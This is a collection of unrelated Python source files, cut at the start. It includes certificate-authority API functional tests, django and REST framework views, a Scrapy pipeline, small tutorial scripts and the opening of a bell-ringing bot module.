return ((cacert.get_subject() == subject_dn) and
(cacert.get_issuer() == issuer_dn))
def get_subca_model(self, root_ref):
now = datetime.datetime.utcnow().isoformat()
subject = "CN=Subordinate CA " + now + ", O=example.com"
return ca_models.CAModel(
parent_ca_ref=root_ref,
description=self.subca_description,
name=self.subca_name,
subject_dn=subject
)
def get_sub_subca_model(self, parent_ca_ref):
now = datetime.datetime.utcnow().isoformat()
subject = "CN=sub sub CA " + now + ", O=example.com"
return ca_models.CAModel(
parent_ca_ref=parent_ca_ref,
description=self.subca_subca_description,
name=self.subca_subca_name,
subject_dn=subject
)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca(self):
self._create_and_verify_subca(self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca(self):
self._create_and_verify_subca(self.get_dogtag_root_ca_ref())
def _create_and_verify_subca(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
root_subject = self.get_signing_cert(root_ca_ref).get_subject()
self.verify_signing_cert(
ca_ref=ca_ref,
subject_dn=convert_to_X509Name(ca_model.subject_dn),
issuer_dn=root_subject)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_subca_of_snakeoil_subca(self):
self._create_subca_of_subca(self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_subca_of_dogtag_subca(self):
self._create_subca_of_subca(self.get_dogtag_root_ca_ref())
def _create_subca_of_subca(self, root_ca_ref):
parent_model = self.get_subca_model(root_ca_ref)
resp, parent_ref = self.ca_behaviors.create_ca(parent_model)
self.assertEqual(201, resp.status_code)
child_model = self.get_sub_subca_model(parent_ref)
resp, child_ref = self.ca_behaviors.create_ca(child_model)
self.assertEqual(201, resp.status_code)
parent_subject = self.get_signing_cert(parent_ref).get_subject()
self.verify_signing_cert(
ca_ref=child_ref,
subject_dn=convert_to_X509Name(child_model.subject_dn),
issuer_dn=parent_subject)
resp = self.ca_behaviors.delete_ca(ca_ref=child_ref)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=parent_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_fail_to_create_subca_of_snakeoil_not_owned_subca(self):
self._fail_to_create_subca_of_not_owned_subca(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_fail_to_create_subca_of_dogtag_not_owned_subca(self):
self._fail_to_create_subca_of_not_owned_subca(
self.get_dogtag_root_ca_ref())
def _fail_to_create_subca_of_not_owned_subca(self, root_ca_ref):
parent_model = self.get_subca_model(root_ca_ref)
resp, parent_ref = self.ca_behaviors.create_ca(parent_model)
self.assertEqual(201, resp.status_code)
child_model = self.get_sub_subca_model(parent_ref)
resp, child_ref = self.ca_behaviors.create_ca(child_model,
user_name=admin_a)
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=parent_ref)
self.assertEqual(204, resp.status_code)
def test_create_subca_with_invalid_parent_ca_id(self):
ca_model = self.get_subca_model(
'http://localhost:9311/cas/invalid_ref'
)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
def test_create_subca_with_missing_parent_ca_id(self):
ca_model = self.get_subca_model(
'http://localhost:9311/cas/missing_ref'
)
del ca_model.parent_ca_ref
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_with_missing_subjectdn(self):
self._create_subca_with_missing_subjectdn(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_with_missing_subjectdn(self):
self._create_subca_with_missing_subjectdn(
self.get_dogtag_root_ca_ref())
def _create_subca_with_missing_subjectdn(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
del ca_model.subject_dn
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_send_cert_order(self):
self._create_subca_and_send_cert_order(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_and_send_cert_order(self):
self._create_subca_and_send_cert_order(
self.get_dogtag_root_ca_ref())
def _create_subca_and_send_cert_order(self, root_ca):
ca_model = self.get_subca_model(root_ca)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
self.send_test_order(ca_ref)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_add_snakeoil_ca__to_project_and_get_preferred(self):
self._add_ca__to_project_and_get_preferred(
self.get_snakeoil_root_ca_ref()
)
@depends_on_ca_plugins('dogtag')
def test_add_dogtag_ca__to_project_and_get_preferred(self):
self._add_ca__to_project_and_get_preferred(
self.get_dogtag_root_ca_ref()
)
def _add_ca__to_project_and_get_preferred(self, ca_ref):
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(hrefs.get_ca_id_from_ref(ca_ref), ca_id)
resp = self.ca_behaviors.remove_ca_from_project(
ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_try_and_fail_to_add_to_proj_snakeoil_subca_that_is_not_mine(self):
self._try_and_fail_to_add_to_proj_subca_that_is_not_mine(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_try_and_fail_to_add_to_proj_dogtag_subca_that_is_not_mine(self):
self._try_and_fail_to_add_to_proj_subca_that_is_not_mine(
self.get_dogtag_root_ca_ref()
)
def _try_and_fail_to_add_to_proj_subca_that_is_not_mine(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_b)
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_and_delete_snakeoil_subca(self):
self._create_and_delete_subca(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_and_delete_dogtag_subca(self):
self._create_and_delete_subca(
self.get_dogtag_root_ca_ref()
)
def _create_and_delete_subca(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
self.ca_behaviors.delete_ca(ca_ref)
resp = self.ca_behaviors.get_ca(ca_ref)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_and_delete_snakeoil_subca_and_artifacts(self):
ca_model = self.get_subca_model(self.get_snakeoil_root_ca_ref())
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
self.ca_behaviors.delete_ca(ca_ref, user_name=admin_a)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.get_ca(ca_ref, user_name=admin_a)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_fail_to_delete_top_level_snakeoil_ca(self):
self._fail_to_delete_top_level_ca(
self.get_snakeoil_root_ca_ref()
)
@depends_on_ca_plugins('dogtag')
def test_fail_to_delete_top_level_dogtag_ca(self):
self._fail_to_delete_top_level_ca(
self.get_dogtag_root_ca_ref()
)
def _fail_to_delete_top_level_ca(self, root_ca_ref):
resp = self.ca_behaviors.delete_ca(
root_ca_ref,
expected_fail=True)
self.assertEqual(403, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_get_cacert(self):
self._create_subca_and_get_cacert(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_and_get_cacert(self):
self._create_subca_and_get_cacert(
self.get_dogtag_root_ca_ref()
)
def _create_subca_and_get_cacert(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.get_cacert(ca_ref, user_name=admin_a)
self.assertEqual(200, resp.status_code)
crypto.load_certificate(crypto.FILETYPE_PEM, resp.text)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_try_and_fail_to_use_snakeoil_subca_that_is_not_mine(self):
self._try_and_fail_to_use_subca_that_is_not_mine(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_try_and_fail_to_use_dogtag_subca_that_is_not_mine(self):
self._try_and_fail_to_use_subca_that_is_not_mine(
self.get_dogtag_root_ca_ref()
)
def _try_and_fail_to_use_subca_that_is_not_mine(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
self.send_test_order(ca_ref=ca_ref, user_name=admin_a)
self.send_test_order(ca_ref=ca_ref, user_name=admin_b,
expected_return=403)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_send_cert_order_and_verify_cert(self):
ca_model = self.get_subca_model(self.get_snakeoil_root_ca_ref())
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
order_ref = self.send_test_order(ca_ref)
order_resp = self.order_behaviors.get_order(order_ref=order_ref)
self.assertEqual(200, order_resp.status_code)
self.wait_for_order(order_resp=order_resp, order_ref=order_ref)
container_resp = self.container_behaviors.get_container(
order_resp.model.container_ref)
self.assertEqual(200, container_resp.status_code)
secret_dict = {}
for secret in container_resp.model.secret_refs:
self.assertIsNotNone(secret.secret_ref)
secret_resp = self.secret_behaviors.get_secret(
secret.secret_ref, "application/octet-stream")
self.assertIsNotNone(secret_resp)
secret_dict[secret.name] = secret_resp.content
certificate = secret_dict['certificate']
new_cert = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
signing_cert = self.get_signing_cert(ca_ref)
issuer = new_cert.get_issuer()
expected_issuer = signing_cert.get_subject()
self.assertEqual(expected_issuer, issuer)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
class ListingCAsTestCase(CATestCommon):
"""Tests for listing CAs.
Must be in a separate class so that we can deselect them
in the parallel CA tests, until we can deselect specific tests
using a decorator.
"""
def test_list_and_get_cas(self):
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertGreater(total, 0)
for item in cas:
ca = self.ca_behaviors.get_ca(item)
self.assertIsNotNone(ca.model.plugin_name)
self.assertIsNotNone(ca.model.ca_id)
self.assertIsNotNone(ca.model.plugin_ca_id)
@depends_on_ca_plugins('snakeoil_ca', 'simple_certificate')
def test_list_snakeoil_and_simple_cert_cas(self):
"""Test if backend loads these specific CAs
Since the standard gate works with the snakeoil CA and the
simple_certificate CA. This test is just to make sure that these two
are specifically loaded.
"""
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertEqual(2, total)
@depends_on_ca_plugins('dogtag')
def test_list_dogtag_cas(self):
"""Test if backend loads this specific CA"""
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertGreater(total, 0)
class ProjectCATestCase(CATestCommon):
def setUp(self):
super(ProjectCATestCase, self).setUp()
@depends_on_ca_plugins('snakeoil_ca', 'simple_certificate')
def test_addition_of_project_ca_affects_getting_ca_list(self):
# Getting list of CAs should get the total configured CAs
(resp, cas, initial_total, _, __) = self.ca_behaviors.get_cas()
self.assertEqual(2, initial_total)
# Set project CA
ca_ref = self.get_snakeoil_root_ca_ref()
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
# Getting list of CAs should get only the project CA for all users
(resp, cas, project_ca_total, _, __) = self.ca_behaviors.get_cas(
user_name=admin_a)
self.assertEqual(1, project_ca_total)
# Getting list of CAs should get only the project CA for all users
(resp, cas, project_ca_total, _, __) = self.ca_behaviors.get_cas(
user_name=creator_a)
self.assertEqual(1, project_ca_total)
# Remove project CA
resp = self.ca_behaviors.remove_ca_from_project(ca_ref,
user_name=admin_a)
self.assertEqual(204, resp.status_code)
# Getting list of CAs should get the total configured CAs (as seen
# before)
(resp, cas, final_total, _, __) = self.ca_behaviors.get_cas()
self.assertEqual(initial_total, final_total)
class GlobalPreferredCATestCase(CATestCommon):
def setUp(self):
super(GlobalPreferredCATestCase, self).setUp()
(_, self.cas, self.num_cas, _, _) = self.ca_behaviors.get_cas()
self.ca_ids = [hrefs.get_ca_id_from_ref(ref) for ref in self.cas]
def tearDown(self):
super(CATestCommon, self).tearDown()
def test_global_preferred_no_project_admin_access(self):
resp = self.ca_behaviors.get_global_preferred()
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(ca_ref=self.cas[0])
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.unset_global_preferred()
self.assertEqual(403, resp.status_code)
def test_global_preferred_update(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[0], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
def test_global_preferred_set_and_unset(self):
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[0], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(404, resp.status_code)
def test_global_preferred_affects_project_preferred(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
def test_project_preferred_overrides_global_preferred(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.add_ca_to_project(
ca_ref=self.cas[0], user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.remove_ca_from_project(
ca_ref=self.cas[0], user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
|
# The process in which a function calls itself directly or indirectly is called recursion.
# Here is a Good example for Recursion in Python..
# This Recursion makes factorial-finding efficient compared to other methods using loops.
def factorial(n):
if n < 0 :
return 'try non-negative integer'
elif n == 0 :
return 1
else:
return n * factorial(n-1)
n = int(input())
print(factorial(n))
|
"""
The test suite has some dependencies that aren't necessarily required for the
blingalytics package itself:
* You should have postgresql installed, with a "bling" user whose password is
set to "bling", and a database named "bling" owned by "bling".
* You need the following Python packages installed: mock, django and psycopg2.
To run the tests, simply run this file::
python test_runner.py
"""
import decimal
import locale
import os
import sys
import unittest
# Set standard thread-wide locale and decimal rounding settings
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
decimal.setcontext(decimal.Context(rounding=decimal.ROUND_HALF_UP))
if __name__ == '__main__':
test_dir = os.path.dirname(os.path.abspath(__file__))
package_dir = os.path.normpath(os.path.join(test_dir, os.pardir, 'blingalytics'))
sys.path = [test_dir, package_dir] + sys.path
os.environ['DJANGO_SETTINGS_MODULE'] = 'support_django.settings'
suite = unittest.TestLoader().loadTestsFromNames([
'test_base',
'test_helpers',
'caches.test_redis_cache',
'sources.test_base',
'sources.test_derived',
'sources.test_django_orm',
# 'sources.test_merge',
'sources.test_static',
])
result = unittest.TextTestRunner(verbosity=1).run(suite)
sys.exit(len(result.errors) + len(result.failures))
|
from dotenv import load_dotenv
load_dotenv()
from src.dao.firebase import firebase_instance
id_token = "id_token"
if __name__ == '__main__':
firebase = firebase_instance()
auth = firebase.auth()
account_info = auth.get_account_info(id_token)
print(account_info)
|
print(1 + 2) # 加法
print(1 - 2) # 减法
print(1 * 2) # 乘法
print(1 / 2) # 浮点数除法
print(3 ** 2) # 指数计算
print(3 % 2) # 取模计算
print(3 // 2) # 整数除法
# 查看数据类型
print(type(1))
print(type(1.11))
print(type(1 + 2j))
print(type("Python"))
print(type([1, 2, 3]))
print(type({'name': '张三'}))
print(type({1.1, 2.2, 3.3}))
|
import zengin
if __name__ == '__main__':
print(zengin.Bank.get('0001'))
for bank in zengin.Bank.search('み'):
print(bank)
for branch in zengin.Branch.get('0001', '001'):
print(branch)
for branch in zengin.Branch.search('0005', 'キチジョウジ'):
print(branch)
for bank in zengin.Bank.major_banks():
print(bank)
for branch in zengin.Bank.get('0001').branches:
print(branch)
for a in zengin.Bank.search('ユウチヨ'):
print(a)
|
"""django-changerequest views"""
from django.core.exceptions import ImproperlyConfigured
from django.db import transaction
from django.http import HttpResponseRedirect, QueryDict
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib import messages as msg
from .forms import HistoryCommentOptionalForm
from .models import ChangeRequest
class PermissionMessageMixin(PermissionRequiredMixin):
""""
PermissionRequiredMixin modified to show error message to user.
By default the PermissionRequiredMixin does not generate an error message, it just redirects to the login page.
As that can be confusing, this simple mixin makes sure the "permission_denied_message" string is returned to the
user via the messages framework and also sets a reasonable default value for it.
"""
permission_denied_message = 'You do not have sufficient permissions to access this page'
def handle_no_permission(self):
msg.add_message(self.request, msg.ERROR, self.permission_denied_message)
return super().handle_no_permission()
class HistoryFormViewMixin:
@transaction.atomic
def form_valid(self, form):
# We don't call super() here because the original form_valid() calls form.save() without commit=False
# If commit=True, then form.save() will *always* save ManyToMany fields, which is bad
form.instance.comment = form.cleaned_data['comment']
self.object = form.save(commit=False)
# By using commit=False, the form gains a "save_m2m()" function, but doesn't actually save the instance
# which is bad because django-changerequest functionilty is triggered there. So let's do it manually:
form.instance.save(form=form)
return HttpResponseRedirect(self.get_success_url())
class HistoryFormsetViewMixin:
formset_class = None
def get_comment_form(self):
if self.request.method in ('POST', 'PUT'):
return HistoryCommentOptionalForm(prefix=self.get_prefix(), data=self.request.POST, files=self.request.FILES)
else:
return HistoryCommentOptionalForm(prefix=self.get_prefix())
def get_context_data(self, **kwargs):
if 'comment_form' not in kwargs:
kwargs['comment_form'] = self.get_comment_form()
return super().get_context_data(**kwargs)
def get_form(self, form_class=None):
if self.formset_class is None:
raise ImproperlyConfigured('HistoryFormsetViewMixin requires formset class to be specified')
return self.formset_class(**self.get_form_kwargs())
def form_valid(self, form):
# We don't call super() here because the original form_valid() from ModelFormMixin overwrites
# self.object with output of form.save(), which is bad because form is a formset here
comment_form = self.get_comment_form()
if comment_form.is_valid():
self.object.comment = comment_form.cleaned_data['comment']
with transaction.atomic():
self.object.save_related(form)
return HttpResponseRedirect(self.get_success_url())
class HistoryDetailView(PermissionMessageMixin, DetailView):
permission_required = 'changerequest.view_changerequest'
template_name = 'history/detail.html'
model = ChangeRequest
class ListQueryStringMixin:
"""QueryString related functionality for ListViews
ALLOWED_ORDER should be a dictionary where the keys are allowed values for
the 'order' value in the query string and the values are what actual ORM ordering
they should be translated to. It can have a 'DEFAULT' key for the default ordering,
which shouldn't be duplicated as valid value (which means this 'order' value will
not be included in a query string, but that's fine because it is the default anyway!)
"""
ALLOWED_ORDER = {}
def get_ordering(self):
order = self.request.GET.get('order', '').strip().lower()
if order in self.ALLOWED_ORDER:
return self.ALLOWED_ORDER[order]
# else: return default (if set)
if 'DEFAULT' in self.ALLOWED_ORDER:
return self.ALLOWED_ORDER['DEFAULT']
def build_querystring(self, page: int = None, order: str = None) -> QueryDict:
q = QueryDict(mutable=True)
# Page
if page is not None:
q['page'] = page
else:
try:
p = int(self.request.GET.get('page', 0))
if p > 0:
q['page'] = p
except ValueError:
pass
# Order
o = self.request.GET.get('order', '').lower().strip()
if order is not None:
if o == order:
q['order'] = order[1:] if order[0] == '-' else '-' + order
else: # Also inverse of '-order'
q['order'] = order
# New sort order should reset page
if 'page' in q:
del q['page']
elif o in self.ALLOWED_ORDER.keys():
q['order'] = o
return q
def get_querystring(self, *args, **kwargs) -> str:
q = self.build_querystring(*args, **kwargs)
if len(q) > 0:
return '?' + q.urlencode()
return ''
def get_order_direction(self, order: str) -> str:
# Determines current order direction (up or down) based on what -new- value of "order" will be (=opposite)
q = self.build_querystring(order=order)
if q['order'][0] == '-':
return 'up'
return 'down'
class HistoryListView(PermissionMessageMixin, ListQueryStringMixin, ListView):
permission_required = 'history.view_changerequest'
template_name = 'history/list.html'
model = ChangeRequest
paginate_by = 25
ALLOWED_ORDER = {
'DEFAULT': ['-date_modified', '-date_created'], # Also equivalent to '-date'
'date': ['date_modified', 'date_created']
}
def get_queryset(self):
qs = super().get_queryset()
qs = qs.select_related('object_type', 'related_type', 'user')
# Status
status_lookup = {v.lower(): k for k, v in ChangeRequest.Status.choices}
status = status_lookup.get(self.request.GET.get('status'), None)
if status is not None:
qs = qs.filter(status=status)
# User
user = self.request.GET.get('user', '').strip()
if user:
qs = qs.filter(user__username__icontains=user)
return qs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Status
context['status'] = 'all' # Default value
status = self.request.GET.get('status', '').lower().strip()
if status.title() in ChangeRequest.Status.labels:
context['status'] = status
return context
def get_absolute_url(self):
return reverse('history:browse')
def build_querystring(self, page: int = None, order: str = None, status: str = None) -> QueryDict:
q = super().build_querystring(page=page, order=order)
# Status
if status is not None:
# Status can be 'all' (or other non-valid value) to remove it from query string
if status.title() in ChangeRequest.Status.labels:
q['status'] = status
# New status filter should reset page
if 'page' in q:
del q['page']
else:
s = self.request.GET.get('status', '').lower().strip()
if s.title() in ChangeRequest.Status.labels:
q['status'] = s
# User
user = self.request.GET.get('user', '').strip()
if user:
q['user'] = user
return q
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from lxml import etree
class LinkscrapyPipeline:
def open_spider(self, spider):
self.root = etree.Element('data')
def close_spider(self, spider):
str_data = etree.tostring(self.root, encoding="UTF-8", pretty_print=True, xml_declaration=True)
with open(spider.name + '.xml', 'wb') as f:
f.write(str_data)
def process_item(self, item, spider):
elem = None
if spider.name == 'hotline':
elem = etree.Element('product')
elem.append(etree.Element('description', text=item['description']))
elem.append(etree.Element('price', text=item['price']))
elem.append(etree.Element('image', text=item['image']))
else:
elem = etree.Element('page', url=item['url'])
for payload in item["payload"]:
fragment = etree.Element('fragment', type=payload['type'], text=payload['data'])
elem.append(fragment)
self.root.append(elem)
return item
|
from rest_framework.generics import (
ListAPIView,
RetrieveAPIView,
DestroyAPIView,
UpdateAPIView
)
from debate.models import DebateTopic
from debate.api.serializers import DebateTopicSerializer
class DebateTopicListAPIView(ListAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicDetailAPIView(RetrieveAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicEditAPIView(UpdateAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
class DebateTopicDeleteAPIView(DestroyAPIView):
queryset = DebateTopic.objects.all()
serializer_class = DebateTopicSerializer
|
"""
Module to contain the Bot class, which acts as 'glue' to combine the rhythm, row generation and
SocketIO communication provided by the Rhythm, RowGenerator and Tower objects into a useful program.
"""
import time
import logging
import threading
from typing import Optional, Any, List
from wheatley import calls
from wheatley.aliases import JSON, Row
from wheatley.stroke import Stroke
from wheatley.bell import Bell
from wheatley.rhythm import Rhythm
from wheatley.row_generation.helpers import generate_starting_row, rounds
from wheatley.tower import RingingRoomTower
from wheatley.parsing import to_bool, json_to_row_generator, RowGenParseError
from wheatley.row_generation import RowGenerator
# Number of seconds that Wheatley is not ringing before Wheatley will return from the mainloop
# Only applies when Wheatley is running in server mode
INACTIVITY_EXIT_TIME = 300
# How long it takes Bryn to say 'Look To'. This is the length of time that Wheatley will wait
# between receiving the 'Look To' signal and when the first stroke is expected
LOOK_TO_DURATION = 3.0 # seconds
# Bot holds a lot of state, allow it to have more fields
# pylint: disable=too-many-instance-attributes
class Bot:
"""
A class to hold all the information that Wheatley will use to glue together the rhythm,
row_gen and socket-io parts together into a useful program.
"""
logger_name = "BOT"
def __init__(
self,
tower: RingingRoomTower,
row_generator: RowGenerator,
do_up_down_in: bool,
stop_at_rounds: bool,
call_comps: bool,
rhythm: Rhythm,
user_name: Optional[str] = None,
server_instance_id: Optional[int] = None,
) -> None:
"""Initialise a Bot with all the parts it needs to run."""
# If this is None then Wheatley is in client mode, otherwise Wheatley is in server mode
self._server_instance_id = server_instance_id
self._last_activity_time = time.time()
self._rhythm = rhythm
self._do_up_down_in = do_up_down_in
self._stop_at_rounds = stop_at_rounds
self._call_comps = call_comps
self._user_name = user_name
self.row_generator = row_generator
# This is the row generator that will be used after 'Look to' is called for the next time,
# allowing for changing the method or composition whilst Wheatley is running. A mutex lock
# is required to prevent the following race condition:
# - The tower size is reduced, and a `s_size_change` signal is sent. This causes
# `self._check_number_of_bells` to be called on `self.next_row_generator`. This checks
# whether or not the stage is too large to fit in the current tower. Suppose that this
# check passes.
# - Between the check and the body of the `if` statement, a new row generator arrives in the
# `s_wheatley_row_gen` signal. This has the new stage, and gets assigned to
# `self.next_row_generator`
# - The `s_size_change` thread continues executing, and sets `self.next_row_generator` to
# `None`, thus overwriting the **new** row generator (which was perfectly fine).
self.next_row_generator_lock = threading.Lock()
self.next_row_generator: Optional[RowGenerator] = None
self._tower = tower
